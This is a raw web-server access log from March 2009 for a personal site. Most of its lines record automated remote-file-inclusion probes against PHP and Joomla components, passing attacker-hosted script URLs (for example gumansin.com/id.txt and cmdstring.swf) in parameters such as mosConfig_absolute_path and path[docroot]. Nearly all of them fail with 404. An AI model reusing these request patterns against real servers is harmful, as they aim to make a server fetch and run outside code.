67.192.251.146 - - [13/Mar/2009:04:20:57 -0500] "GET /logs/access_log.1211328000//include/admin.lib.inc.php?site_path=http://www.littleauctionbay.com/raid.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
67.192.251.146 - - [13/Mar/2009:04:20:57 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.littleauctionbay.com/raid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:04:21:17 -0500] "GET /logs/access_log.1217116800%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:21:42 -0500] "GET /logs/access_log.1217116800%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:22:44 -0500] "GET /logs/access_log.1217289600///?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
91.52.190.23 - - [13/Mar/2009:04:23:20 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
91.52.190.23 - - [13/Mar/2009:04:23:27 -0500] "GET /logs/access_log.1211328000//include/admin.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
91.52.190.23 - - [13/Mar/2009:04:23:27 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
69.36.4.145 - - [13/Mar/2009:04:24:00 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
69.36.4.145 - - [13/Mar/2009:04:24:00 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
69.36.4.145 - - [13/Mar/2009:04:24:00 -0500] "GET /logs/access_log.1211328000//include/admin.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
65.254.49.34 - - [13/Mar/2009:04:24:48 -0500] "GET /logs/access_log.1217548800/index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
65.254.49.34 - - [13/Mar/2009:04:24:52 -0500] "GET /index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.254.49.34 - - [13/Mar/2009:04:24:52 -0500] "GET /logs/index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
65.254.49.34 - - [13/Mar/2009:04:25:12 -0500] "GET /logs/access_log.1217462400/index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.76.163.60 - - [13/Mar/2009:04:25:38 -0500] "GET /logs/access_log.1217289600///?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:25:44 -0500] "GET /logs/access_log.1217289600///?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
65.254.49.34 - - [13/Mar/2009:04:26:03 -0500] "GET /logs/access_log.1214352000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
124.0.71.7 - - [13/Mar/2009:04:27:33 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.7777club.com/b1ttletX.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
124.0.71.7 - - [13/Mar/2009:04:27:34 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.7777club.com/b1ttletX.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
65.254.49.34 - - [13/Mar/2009:04:28:56 -0500] "GET /logs/access_log.1215302400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
70.38.31.50 - - [13/Mar/2009:04:29:23 -0500] "GET /logs//includes/layout/plain.footer.php?mainnav=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:04:29:23 -0500] "GET //includes/layout/plain.footer.php?mainnav=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:04:29:23 -0500] "GET /logs/access_log.1214697600//includes/layout/plain.footer.php?mainnav=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:04:31:28 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:04:31:28 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:04:31:28 -0500] "GET /logs/access_log.1217721600/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:04:31:45 -0500] "GET /logs/access_log.1219536000/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:04:34:29 -0500] "GET /logs/access_log.1217721600%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 359 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:04:34:52 -0500] "GET /logs/access_log.1212364800%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 359 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:04:36:25 -0500] "GET /logs/access_log.1223251200/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:04:36:25 -0500] "GET /logs/access_log.1214092800/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:04:37:00 -0500] "GET /logs/access_log.1216684800%20%20//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:04:37:00 -0500] "GET //include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:04:37:00 -0500] "GET /logs//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:04:37:07 -0500] "GET /logs/access_log.1216944000%20%20//include/write.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.110.18.100 - - [13/Mar/2009:04:37:20 -0500] "GET /logs/access_log.1201564800///bbs/skin/zero_vote/error.php?dir=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
61.110.18.100 - - [13/Mar/2009:04:37:20 -0500] "GET ///bbs/skin/zero_vote/error.php?dir=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
61.110.18.100 - - [13/Mar/2009:04:37:21 -0500] "GET /logs///bbs/skin/zero_vote/error.php?dir=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
69.64.34.249 - - [13/Mar/2009:04:37:55 -0500] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.64.34.249 - - [13/Mar/2009:04:37:55 -0500] "GET /logs/access_log.1225929600//include/scripts/export_batch.inc.php?DIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
61.110.18.100 - - [13/Mar/2009:04:37:58 -0500] "GET /logs/access_log.1206576000///bbs/skin/zero_vote/error.php?dir=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
69.64.34.249 - - [13/Mar/2009:04:37:59 -0500] "GET //include/scripts/export_batch.inc.php?DIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.64.34.249 - - [13/Mar/2009:04:38:39 -0500] "GET /logs/access_log.1226793600//include/scripts/export_batch.inc.php?DIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
202.53.250.24 - - [13/Mar/2009:04:41:15 -0500] "GET /kin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
202.53.250.24 - - [13/Mar/2009:04:41:15 -0500] "GET /logs/kin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:04:46:12 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:46:13 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://gumansin.com/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:46:13 -0500] "GET /logs/access_log.1219795200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://gumansin.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:46:13 -0500] "GET /logs/access_log.1216166400%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://gumansin.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:46:16 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://gumansin.com/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:46:16 -0500] "GET /logs/access_log.1216166400%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://gumansin.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:46:16 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
65.55.208.123 - - [13/Mar/2009:04:46:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.202.2.220 - - [13/Mar/2009:04:46:16 -0500] "GET /logs/access_log.1219795200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://gumansin.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.208.123 - - [13/Mar/2009:04:46:18 -0500] "GET /logs/access_log.1196208000 HTTP/1.1" 200 255222 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.73.65.135 - - [13/Mar/2009:04:46:22 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.73.65.135 - - [13/Mar/2009:04:46:26 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.73.65.135 - - [13/Mar/2009:04:46:26 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.73.65.135 - - [13/Mar/2009:04:46:27 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.73.65.135 - - [13/Mar/2009:04:46:27 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
211.220.195.71 - - [13/Mar/2009:04:48:11 -0500] "GET /logs//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.220.195.71 - - [13/Mar/2009:04:48:11 -0500] "GET //atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.220.195.71 - - [13/Mar/2009:04:48:11 -0500] "GET /logs/access_log.1214524800%20%20//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:04:48:16 -0500] "GET /logs/access_log.1217721600/errors.php?error=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:04:48:16 -0500] "GET /logs/errors.php?error=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:04:48:16 -0500] "GET /errors.php?error=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.103.131.81 - - [13/Mar/2009:04:48:26 -0500] "GET /logs/access_log.1214524800//atom.php5?page=http://www.boulderstreaming.com//ray/modules/global/inc/idj.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
66.103.131.81 - - [13/Mar/2009:04:48:26 -0500] "GET //atom.php5?page=http://www.boulderstreaming.com//ray/modules/global/inc/idj.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
66.103.131.81 - - [13/Mar/2009:04:48:26 -0500] "GET /logs//atom.php5?page=http://www.boulderstreaming.com//ray/modules/global/inc/idj.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
66.103.131.81 - - [13/Mar/2009:04:48:49 -0500] "GET /logs/access_log.1217289600//atom.php5?page=http://www.boulderstreaming.com//ray/modules/global/inc/idj.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
211.202.2.220 - - [13/Mar/2009:04:48:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:48:54 -0500] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:48:54 -0500] "GET //skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:48:57 -0500] "GET //skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:48:57 -0500] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:48:57 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.220.195.71 - - [13/Mar/2009:04:49:04 -0500] "GET /logs/access_log.1216857600%20%20//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.182.137.218 - - [13/Mar/2009:04:49:05 -0500] "GET //oneadmin/newsletter/samplenewsletter.php?path[docroot]=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.820"
211.202.2.220 - - [13/Mar/2009:04:49:20 -0500] "GET /logs/access_log.1211500800//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:49:21 -0500] "GET /logs/access_log.1211500800//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.220.195.71 - - [13/Mar/2009:04:49:21 -0500] "GET /logs/access_log.1214524800//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.93.97.106 - - [13/Mar/2009:04:50:06 -0500] "GET /logs//atom.php5?page=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.93.97.106 - - [13/Mar/2009:04:50:06 -0500] "GET /logs/access_log.1214524800//atom.php5?page=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.93.97.106 - - [13/Mar/2009:04:50:06 -0500] "GET //atom.php5?page=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.93.97.106 - - [13/Mar/2009:04:50:16 -0500] "GET /logs/access_log.1217289600//atom.php5?page=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.220.195.71 - - [13/Mar/2009:04:51:11 -0500] "GET /logs/access_log.1217289600//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.220.195.71 - - [13/Mar/2009:04:51:41 -0500] "GET /logs/access_log.1216944000//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.182.137.218 - - [13/Mar/2009:04:51:54 -0500] "GET /logs/access_log.1205366400//oneadmin/newsletter/samplenewsletter.php?path[docroot]=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.820"
207.182.137.218 - - [13/Mar/2009:04:51:54 -0500] "GET //oneadmin/newsletter/samplenewsletter.php?path[docroot]=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.820"
207.182.137.218 - - [13/Mar/2009:04:51:54 -0500] "GET /logs//oneadmin/newsletter/samplenewsletter.php?path[docroot]=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.820"
121.78.85.87 - - [13/Mar/2009:04:53:10 -0500] "GET //?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
121.78.85.87 - - [13/Mar/2009:04:53:11 -0500] "GET /logs//?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 200 122044 "-""Mozilla/5.0"
121.78.85.87 - - [13/Mar/2009:04:53:31 -0500] "GET /logs/access_log.1215216000%20%20//?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:54:25 -0500] "GET /logs/access_log.1201564800%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:54:35 -0500] "GET /logs/access_log.1211500800%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:54:43 -0500] "GET /logs/access_log.1201564800%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:54:45 -0500] "GET /logs/access_log.1211500800%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.182.137.218 - - [13/Mar/2009:04:54:55 -0500] "GET /logs/access_log.1210550400//oneadmin/newsletter/samplenewsletter.php?path[docroot]=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.820"
220.95.212.45 - - [13/Mar/2009:04:55:04 -0500] "GET /logs/access_log.1212192000/errors.php?error=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
195.47.67.57 - - [13/Mar/2009:04:56:36 -0500] "GET //inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:36 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:36 -0500] "GET /logs/access_log.1216857600%20%20//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:38 -0500] "GET //inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:38 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:38 -0500] "GET /logs/access_log.1216857600%20%20//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:56:39 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:56:40 -0500] "GET //inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:56:40 -0500] "GET /logs/access_log.1216857600//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:56:41 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:56:41 -0500] "GET /logs/access_log.1216857600%20%20//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:56:41 -0500] "GET //inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:04:56:44 -0500] "GET //trans/trans.php?trans=ko&page=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
195.47.67.57 - - [13/Mar/2009:04:56:50 -0500] "GET //inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:50 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:50 -0500] "GET /logs/access_log.1216857600//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:52 -0500] "GET //inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:52 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:04:56:52 -0500] "GET /logs/access_log.1216857600//inc/header.php/step_one.php?server_inc=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:04:57:13 -0500] "GET //trans/trans.php?trans=fr&page=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:04:59:30 -0500] "GET //?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:59:30 -0500] "GET /logs/access_log.1215302400%20%20//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:59:32 -0500] "GET /logs//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 122044 "-""Mozilla/5.0"
202.125.46.29 - - [13/Mar/2009:05:00:41 -0500] "GET //atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
202.125.46.29 - - [13/Mar/2009:05:00:46 -0500] "GET /logs/access_log.1214092800//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.125.46.29 - - [13/Mar/2009:05:00:46 -0500] "GET /logs//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.125.46.29 - - [13/Mar/2009:05:00:47 -0500] "GET /logs/access_log.1219881600//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:05:01:19 -0500] "GET /logs/access_log.1216512000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:01:19 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
